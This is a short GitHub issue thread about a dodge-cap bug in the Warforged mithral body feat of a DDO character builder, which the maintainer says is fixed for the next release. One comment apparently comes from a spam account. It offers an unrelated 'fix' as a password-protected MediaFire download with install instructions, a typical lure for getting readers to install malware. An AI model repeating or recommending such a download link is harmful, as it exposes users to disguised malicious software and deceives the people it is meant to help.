### ISSUE TITLE
Warforged mithral body 

### ISSUE THREAD

**Issue by Mummykiller** [Maetrim/DDOBuilderV2#148]
![image](https://github.com/user-attachments/assets/93014dd4-eb0c-4164-b27e-df8d279ce6ba)
i am not sure what my dodge cap should be but it seems to not be affected by the shadowdancer's light armor max dex bonus so i asume something else is wrong with the feat

**Comment by Mummykiller** [comment]
![image](https://github.com/user-attachments/assets/6eb5d917-e7b2-4197-8615-06aa04922af6)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Maetrim** [comment]
Also fixed for next release.
